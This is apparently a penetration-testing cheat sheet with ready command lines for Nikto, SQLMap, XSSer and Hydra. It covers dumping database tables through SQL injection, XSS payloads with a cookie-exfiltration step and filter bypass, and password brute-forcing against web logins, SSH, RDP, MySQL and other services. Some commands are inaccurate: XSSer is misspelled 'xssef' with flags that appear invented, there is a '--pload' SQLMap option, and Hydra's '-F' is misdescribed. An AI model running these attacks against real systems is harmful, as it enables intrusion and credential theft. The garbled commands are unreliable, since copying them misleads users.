🛠️Nikto, SQLMap, XSSer & Hydra Overview
Nikto
Nikto is a powerful web server vulnerability scanner used to identify security issues on websites. Here are several ways to use Nikto effectively:
Basic Web Server Scan:
Perform a basic scan on a website:
nikto -h https://www.example.com
Scan Specific Port:
Scan a specific port on the target:
nikto -h https://www.example.com -p 8080
Scan Multiple Hosts:
Scan multiple hosts:
nikto -h https://www.example1.com https://www.example2.com
Save Output to File:
Save scan results to a file (
output.txt
):nikto -h https://www.example.com -o output.txt
Full Scan with Manual Tuning:
Perform a comprehensive scan with manual tuning options:
nikto -h https://www.example.com -maxtime 3600 -Plugins -Tuning 8
SSL Certificate Check:
Check SSL certificate details:
nikto -h https://www.example.com -ssl
Scan with Authentication:
Perform a scan with authentication credentials (
admin:password
):nikto -h https://www.example.com -id admin:password
Suppress Output:
Suppress all output (useful for scripting):
nikto -h https://www.example.com -o /dev/null
Scan Specific Paths:
Scan specific paths (
/app
,/secure
) on the target:nikto -h https://www.example.com -C all -Tuning 2 -p 443 -root /app,/secure
Disable Certain Checks:
Disable specific checks (e.g., XSS):
nikto -h https://www.example.com -C all,-XSS
SQLMap
SQLMap is a powerful command-line tool used for detecting and exploiting SQL injection vulnerabilities in web applications. Here are several examples of how to use SQLMap effectively:
Basic Scan for SQL Injection:
Perform a basic scan to detect SQL injection vulnerabilities:
sqlmap -u "https://www.example.com/page?id=1"
Detecting SQL Injection and Getting Database Information:
Detect SQL injection and retrieve database information:
sqlmap -u "https://www.example.com/page?id=1" --dbs
Enumerating Tables in a Database:
Enumerate tables in a specific database (
dbname
):sqlmap -u "https://www.example.com/page?id=1" -D dbname --tables
Dumping Data from a Specific Table:
Dump data from a specific table (
users
):sqlmap -u "https://www.example.com/page?id=1" -D dbname -T users --dump
Exploiting Time-Based Blind SQL Injection:
Exploit time-based blind SQL injection technique with a specified time delay (
5
seconds):sqlmap -u "https://www.example.com/page?id=1" --technique=T --time-sec=5
Using Custom Injection Payload:
Use a custom injection payload (
1' OR '1'='1
) with data parameter (param=value
):sqlmap -u "https://www.example.com/page?id=1" --data="param=value" --pload="1' OR '1'='1"
Dumping All Databases:
Dump all databases on the target server:
sqlmap -u "https://www.example.com/page?id=1" --all-dbs
Brute Forcing Table Columns:
Brute force table columns in a specific database and table (
dbname.users
):sqlmap -u "https://www.example.com/page?id=1" -D dbname -T users --columns
Exploiting Union-Based SQL Injection:
Exploit union-based SQL injection technique:
sqlmap -u "https://www.example.com/page?id=1" --technique=U
Using a Configuration File:
Use SQLMap with a configuration file (
sqlmapconfig.conf
):sqlmap -c sqlmapconfig.conf
XSSer
XSSer is a command-line tool designed for detecting and exploiting Cross-Site Scripting (XSS) vulnerabilities in web applications. Here are several examples of how to use XSSer effectively:
Basic Scan for Stored XSS:
Perform a basic scan for stored XSS vulnerabilities on a specific URL parameter (
comment
):xssef -u "https://www.example.com/profile?id=1" -c "comment"
DOM-based XSS Scan:
Conduct a scan specifically for DOM-based XSS vulnerabilities:
xssef -u "https://www.example.com/page" --dom
Scanning Multiple URLs:
Scan multiple URLs listed in a file (
urls.txt
):xssef -l urls.txt
Cookie-based XSS Exploitation:
Exploit XSS using a specific cookie (
auth=12345
):xssef -u "https://www.example.com/login" --cookie "auth=12345"
Reflected XSS Detection:
Detect reflected XSS vulnerabilities with a custom payload in a query parameter:
xssef -u "https://www.example.com/search?q=<script>alert(1)</script>"
Blind XSS Scan with Custom Payload:
Perform a blind XSS scan with a custom payload (
<script>alert(1)</script>
) injected into a parameter (name
):xssef -u "https://www.example.com/profile" -v -p "name" -vPayload "<script>alert(1)</script>"
Exfiltrating Cookies via XSS:
Exfiltrate cookies (
auth=12345
) via XSS exploitation:xssef -u "https://www.example.com/profile" --cookie "auth=12345" -E
Brute Forcing Payloads:
Brute force payloads to discover XSS vulnerabilities:
xssef -u "https://www.example.com/page" --brute
Custom User-Agent Header:
Send requests with a custom User-Agent header (
MyCustomUserAgent
):xssef -u "https://www.example.com/page" -H "User-Agent: MyCustomUserAgent"
XSS Filter Bypass Attempt:
Attempt to bypass XSS filters on the target:
xssef -u "https://www.example.com/page" --filter-bypass
Hydar Tool
Hydra is a versatile command-line tool for performing brute force attacks against various protocols and services. Here are several examples of how to use Hydra effectively:
HTTP/HTTPS Authentication
Brute Force Attack on Login Form:
Perform a brute force attack on a login form with a specific username (
admin
) and passwords from a file (passwords.txt
):hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
Dictionary Attack with Custom Usernames:
Conduct a dictionary attack using custom usernames (
users.txt
) and passwords (passwords.txt
):hydra -L users.txt -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
Using Custom User-Agent Header:
Send requests with a custom User-Agent header (
MyCustomUserAgent
):hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -H "User-Agent: MyCustomUserAgent"
Specifying a Non-Standard Port:
Specify a non-standard port (
8080
) for the target service:hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -s 8080
Using a Proxy for Requests:
Route requests through a SOCKS5 proxy (
localhost:9050
):hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -x socks5://localhost:9050
Brute Forcing Different HTTP Methods:
Perform brute force attacks using different HTTP methods (e.g., GET, POST):
hydra -l admin -P passwords.txt example.com http-get-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
Parallel Login Attempts:
Increase the number of parallel login attempts (
16
):hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -t 16
Limiting Number of Attempts per User:
Limit the number of login attempts per user (
-F
):hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -F
Other Protocol Examples
Here are examples for brute forcing passwords across various protocols:
SSH:
hydra -l username -P passwords.txt ssh://target_ip
FTP:
hydra -l admin -P wordlist.txt ftp://ftp.example.com
SMTP:
hydra -l [email protected] -P passwords.txt smtp://mail.example.com
MySQL:
hydra -l root -P passwords.txt mysql://target_ip
RDP:
hydra -l administrator -P passwords.txt rdp://target_ip
VNC:
hydra -l admin -P passwords.txt vnc://target_ip
Telnet:
hydra -l admin -P passwords.txt telnet://target_ip
Hacker's Mantra:
Are hackers a threat? The degree of threat presented by any conduct, whether legal or illegal, depends on the actions and intent of the individual and the harm they cause.
Last updated
Was this helpful?